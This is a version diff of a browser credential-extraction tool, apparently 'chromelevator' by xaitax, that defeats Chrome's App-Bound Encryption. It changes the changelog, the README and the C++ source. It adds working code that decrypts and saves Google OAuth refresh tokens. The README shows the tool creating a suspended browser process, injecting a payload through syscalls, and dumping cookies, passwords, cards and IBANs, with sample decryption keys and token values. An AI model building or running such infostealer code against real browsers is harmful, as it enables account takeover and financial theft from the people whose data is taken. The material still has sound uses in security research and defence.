v0.17.1

Author: xaitax

CHANGELOG.md

@@ -2,6 +2,12 @@
 
 ## 🆕 Changelog
 
+### v0.17.1
+- **Google Auth Token Extraction**: Added support for extracting Google OAuth2 Refresh Tokens.
+  - Extracts and decrypts tokens used for Chrome Sync and Google services.
+  - Outputs to `tokens.json` in the browser profile directory.
+- **Cookie Extraction**: Added `expires` timestamp and `path` fields to the cookie extraction output, enabling identification of expired cookies.
+
 ### v0.17.0
 - **Full Codebase Refactor**: Completely rewrote the project into a modern, modular C++ architecture.
 - **Compile-Time Key Derivation**: Eliminated static encryption keys from the binary.

README.md

@@ -31,7 +31,7 @@ This tool's effectiveness is rooted in a combination of modern, evasion-focused
 
 ### Core Functionality
 
-- 🔓 Full user-mode decryption of cookies, passwords, payment methods, and IBANs.
+- 🔓 Full user-mode decryption of cookies, passwords, payment methods, IBANs, and Google OAuth tokens.
 - 📁 Discovers and processes all user profiles (Default, Profile 1, etc.).
 - 📝 Exports all extracted data into structured JSON files, organized by profile.
 - 🔍 Comprehensive browser fingerprinting with system information.
@@ -76,7 +76,8 @@ This matrix outlines the extraction capabilities for each supported browser.
 | **Cookies**         | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |
 | **Passwords**       | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |
 | **Payment Methods** | ✅ ABE                | ✅ ABE                | ✅ ABE                                 |
-| **IBANs**           | ✅ ABE                | ✅ ABE                | ❌ Not existing                        |
+| **IBANs**           | ✅ ABE                | ✅ ABE                | ❌ N/A                                 |
+| **Auth Tokens**     | ✅ Google             | ❌ N/A                | ❌ N/A                                 |
 
 **Encryption Method Notes:**
 - **ABE (App-Bound Encryption):** Using AES-256-GCM with browser-specific master keys decrypted via COM interfaces.
@@ -153,7 +154,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.0 by @xaitax
+ x64 & ARM64 | v0.17.1 by @xaitax
 
   Usage: chromelevator.exe [options] <chrome|edge|brave|all>
 
@@ -184,27 +185,28 @@ _________ .__                         ___________.__                       __
 
 ```bash
 PS> .\chromelevator.exe all
+
 _________ .__                         ___________.__                       __
 \_   ___ \|  |_________  ____   _____ \_   _____/|  |   _______  _______ _/  |_  ___________
 /    \  \/|  |  \_  __ \/  _ \ /     \ |    __)_ |  | _/ __ \  \/ /\__  \\   __\/  _ \_  __ \
 \     \___|   Y  \  | \(  <_> )  Y Y  \|        \|  |_\  ___/\   /  / __ \|  | (  <_> )  | \/
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.0 by @xaitax
+ x64 & ARM64 | v0.17.1 by @xaitax
 
   ┌──── Brave ──────────────────────────────────────
   │
   │ Decryption Key
   │ 2522A3C1730EA8EE84BAAD1994DB31E20437D9DCF27628997598BB5B86F73DCD
   │
   ├── Default
-  │   Cookies     2446/2467
+  │   Cookies     2439/2460
   │   Passwords   46
   │   Cards       1
   │   IBANs       1
   │
-  └── 2446 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)
+  └── 2439 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)
       C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Brave
 
   ┌──── Chrome ──────────────────────────────────────
@@ -217,12 +219,13 @@ _________ .__                         ___________.__                       __
   │   Passwords   1
   │
   ├── Profile 1
-  │   Cookies     768/773
-  │   Passwords   2
+  │   Cookies     815/820
+  │   Passwords   789
   │   Cards       1
   │   IBANs       1
+  │   Tokens      1
   │
-  └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)
+  └── 1193 cookies, 790 passwords, 1 cards, 1 IBANs, 1 tokens (2 profiles)
       C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome
 
   ┌──── Edge ──────────────────────────────────────
@@ -231,14 +234,14 @@ _________ .__                         ___________.__                       __
   │ B0334FAD7F5805362CB4C44B144A95AB7A68F7346EF99EB3F175F09DB08C8FD9
   │
   ├── Default
-  │   Cookies     220/222
+  │   Cookies     214/216
   │   Passwords   2
   │   Cards       1
   │
   ├── Profile 1
-  │   Cookies     42
+  │   Cookies     25
   │
-  └── 262 cookies, 2 passwords, 1 cards (2 profiles)
+  └── 239 cookies, 2 passwords, 1 cards (2 profiles)
       C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Edge
 ```
 
@@ -254,23 +257,23 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.0 by @xaitax
+ x64 & ARM64 | v0.17.1 by @xaitax
 
   ┌──── Chrome ──────────────────────────────────────
   │ Terminating browser network services...
   │   [+] Network services terminated
   │ Creating suspended process: C:\Program Files\Google\Chrome\Application\chrome.exe
-  │   [+] Process created (PID: 25184)
-  │   [+] IPC pipe established: \\.\pipe\chrome.nacl.20027_76C4
+  │   [+] Process created (PID: 13020)
+  │   [+] IPC pipe established: \\.\pipe\chrome.sync.26370.18285.8B20
   │ Deriving runtime decryption keys...
-  │   [+] Payload decrypted (1044 KB)
-  │   [+] Bootstrap entry point resolved (offset: 0x2a690)
+  │   [+] Payload decrypted (1048 KB)
+  │   [+] Bootstrap entry point resolved (offset: 0x2a790)
   │ Allocating memory in target process via syscall...
-  │   [+] Memory allocated at 0x1c2dec60000 (1048 KB)
+  │   [+] Memory allocated at 0x2245a600000 (1052 KB)
   │   [+] Payload + parameters written
   │   [+] Memory protection set to PAGE_EXECUTE_READ
   │ Creating remote thread via syscall...
-  │   [+] Thread created (entry: 0x1c2dec8a690)
+  │   [+] Thread created (entry: 0x2245a62a790)
   │ Awaiting payload connection...
   │   [+] Payload connected
   │ Running in Chrome
@@ -284,15 +287,16 @@ _________ .__                         ___________.__                       __
   │   Passwords   1
   │
   ├── Profile 1
-  │   Size        610 MB
-  │   Cookies     768/773
-  │   Passwords   2
+  │   Size        739 MB
+  │   Cookies     815/820
+  │   Passwords   789
   │   Cards       1
   │   IBANs       1
+  │   Tokens      1
   │ Extracting comprehensive fingerprint...
   │ Fingerprint saved to fingerprint.json
   │
-  └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)
+  └── 1193 cookies, 790 passwords, 1 cards, 1 IBANs, 1 tokens (2 profiles)
       C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome
 ```
 
@@ -319,11 +323,15 @@ Each cookie file is a JSON array of objects:
   {
     "host": "accounts.google.com",
     "name": "ACCOUNT_CHOOSER",
+    "path": "/",
+    "expires": 1766591611,
     "value": "AFx_qI781-…"
   },
   {
     "host": "mail.google.com",
     "name": "OSID",
+    "path": "/mail",
+    "expires": 1766591611,
     "value": "g.a000uwj5ufIS…"
   },
   …
@@ -375,7 +383,21 @@ Each IBAN file is a JSON array of objects:
 ]
 ```
 
-### 🔍 Browser Fingerprinting 
+### 🎟️ Token Extraction
+
+Each token file is a JSON array of objects containing the service, the decrypted token, and the binding key (if present):
+
+```json
+[
+  {
+    "service": "AccountId-112823413702122221871",
+    "token": "1//03VJGN_vL2FR5CgYIARAAGAMSNwF-L9IrtiyH_tmtOneETFya5GEGiewlEMrLwDMuOl56zRoShNE77DfyOXhofn5Ryo_...",
+    "binding_key": ""
+  }
+]
+```
+
+### 🔍 Browser Fingerprinting
 
 When using the `--fingerprint` or `-f` flag, a comprehensive metadata report is generated:
 

src/core/console.hpp

@@ -115,7 +115,7 @@ namespace Core {
         }
 
         // Summary line
-        void Summary(int cookies, int passwords, int cards, int ibans, int profiles, const std::string& outputPath) const {
+        void Summary(int cookies, int passwords, int cards, int ibans, int tokens, int profiles, const std::string& outputPath) const {
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
             std::cout << "  \xB3" << std::endl;
             std::cout << "  \xC0\xC4\xC4 ";
@@ -126,6 +126,7 @@ namespace Core {
             if (passwords > 0) parts.push_back(std::to_string(passwords) + " passwords");
             if (cards > 0) parts.push_back(std::to_string(cards) + " cards");
             if (ibans > 0) parts.push_back(std::to_string(ibans) + " IBANs");
+            if (tokens > 0) parts.push_back(std::to_string(tokens) + " tokens");
 
             for (size_t i = 0; i < parts.size(); i++) {
                 std::cout << parts[i];

src/core/version.hpp

@@ -6,9 +6,9 @@
 namespace Core {
 
     // Main version string - shown in banner
-    constexpr const char* VERSION = "0.17.0";
+    constexpr const char* VERSION = "0.17.1";
 
     // Full version for build identification (update for releases)
-    constexpr const char* BUILD_TAG = "v0.17.0";
+    constexpr const char* BUILD_TAG = "v0.17.1";
 
 }

src/injector/injector_main.cpp

@@ -47,8 +47,8 @@ void ProcessBrowser(const BrowserInfo& browser, bool verbose, bool fingerprint,
         pipe.ProcessMessages(verbose);
 
         auto pStats = pipe.GetStats();
-        if (pStats.cookies > 0 || pStats.passwords > 0 || pStats.cards > 0 || pStats.ibans > 0) {
-            console.Summary(pStats.cookies, pStats.passwords, pStats.cards, pStats.ibans,
+        if (pStats.cookies > 0 || pStats.passwords > 0 || pStats.cards > 0 || pStats.ibans > 0 || pStats.tokens > 0) {
+            console.Summary(pStats.cookies, pStats.passwords, pStats.cards, pStats.ibans, pStats.tokens,
                            pStats.profiles, (output / browser.displayName).string());
             stats.successful++;
         } else {

src/injector/pipe_server.cpp

@@ -123,6 +123,11 @@ namespace Injector {
                     m_stats.ibans += count;
                     console.ExtractionResult("IBANs", count);
                 }
+                else if (msg.rfind("TOKENS:", 0) == 0) {
+                    int count = std::stoi(msg.substr(7));
+                    m_stats.tokens += count;
+                    console.ExtractionResult("Tokens", count);
+                }
                 else if (msg.rfind("DATA:", 0) == 0) {
                     std::string data = msg.substr(5);
                     size_t sep = data.find('|');

src/injector/pipe_server.hpp

@@ -16,6 +16,7 @@ namespace Injector {
         int passwords = 0;
         int cards = 0;
         int ibans = 0;
+        int tokens = 0;
         int profiles = 0;
     };
 

src/payload/data_extractor.cpp

@@ -63,6 +63,7 @@ namespace Payload {
                 if (auto db = OpenDatabase(webDataPath)) {
                     ExtractCards(db, m_outputBase / browserName / profilePath.filename() / "cards.json");
                     ExtractIBANs(db, m_outputBase / browserName / profilePath.filename() / "iban.json");
+                    ExtractTokens(db, m_outputBase / browserName / profilePath.filename() / "tokens.json");
                     sqlite3_close(db);
                 }
             }
@@ -92,6 +93,8 @@ namespace Payload {
                     std::stringstream ss;
                     ss << "{\"host\":\"" << EscapeJson((char*)sqlite3_column_text(stmt, 0)) << "\","
                        << "\"name\":\"" << EscapeJson((char*)sqlite3_column_text(stmt, 1)) << "\","
+                       << "\"path\":\"" << EscapeJson((char*)sqlite3_column_text(stmt, 2)) << "\","
+                       << "\"expires\":" << sqlite3_column_int64(stmt, 5) << ","
                        << "\"value\":\"" << EscapeJson(val) << "\"}";
                     entries.push_back(ss.str());
                 }
@@ -240,6 +243,59 @@ namespace Payload {
         }
     }
 
+    void DataExtractor::ExtractTokens(sqlite3* db, const std::filesystem::path& outFile) {
+        sqlite3_stmt* stmt;
+        bool hasBindingKey = true;
+        
+        if (sqlite3_prepare_v2(db, "SELECT service, encrypted_token, binding_key FROM token_service", -1, &stmt, nullptr) != SQLITE_OK) {
+            hasBindingKey = false;
+            if (sqlite3_prepare_v2(db, "SELECT service, encrypted_token FROM token_service", -1, &stmt, nullptr) != SQLITE_OK) return;
+        }
+
+        std::vector<std::string> entries;
+        while (sqlite3_step(stmt) == SQLITE_ROW) {
+            const void* blob = sqlite3_column_blob(stmt, 1);
+            int len = sqlite3_column_bytes(stmt, 1);
+            
+            if (blob && len > 0) {
+                std::vector<uint8_t> enc((uint8_t*)blob, (uint8_t*)blob + len);
+                auto dec = Crypto::AesGcm::Decrypt(m_key, enc);
+                if (dec) {
+                    std::string val((char*)dec->data(), dec->size());
+                    std::string bindingKey = "";
+                    
+                    if (hasBindingKey) {
+                        const void* bKeyBlob = sqlite3_column_blob(stmt, 2);
+                        int bKeyLen = sqlite3_column_bytes(stmt, 2);
+                        if (bKeyBlob && bKeyLen > 0) {
+                            std::vector<uint8_t> encKey((uint8_t*)bKeyBlob, (uint8_t*)bKeyBlob + bKeyLen);
+                            auto decKey = Crypto::AesGcm::Decrypt(m_key, encKey);
+                            if (decKey) {
+                                bindingKey = std::string((char*)decKey->data(), decKey->size());
+                            }
+                        }
+                    }
+
+                    std::stringstream ss;
+                    ss << "{\"service\":\"" << EscapeJson((char*)sqlite3_column_text(stmt, 0)) << "\","
+                       << "\"token\":\"" << EscapeJson(val) << "\","
+                       << "\"binding_key\":\"" << EscapeJson(bindingKey) << "\"}";
+                    entries.push_back(ss.str());
+                }
+            }
+        }
+        sqlite3_finalize(stmt);
+
+        if (!entries.empty()) {
+            std::filesystem::create_directories(outFile.parent_path());
+            std::ofstream out(outFile);
+            out << "[\n";
+            for (size_t i = 0; i < entries.size(); ++i) out << entries[i] << (i < entries.size() - 1 ? ",\n" : "\n");
+            out << "]";
+            m_pipe.Log("TOKENS:" + std::to_string(entries.size()));
+        }
+    }
+
     std::string DataExtractor::EscapeJson(const std::string& s) {
         std::ostringstream o;
         for (char c : s) {

src/payload/data_extractor.hpp

@@ -24,6 +24,7 @@ namespace Payload {
         void ExtractPasswords(sqlite3* db, const std::filesystem::path& outFile);
         void ExtractCards(sqlite3* db, const std::filesystem::path& outFile);
         void ExtractIBANs(sqlite3* db, const std::filesystem::path& outFile);
+        void ExtractTokens(sqlite3* db, const std::filesystem::path& outFile);
 
         std::string EscapeJson(const std::string& s);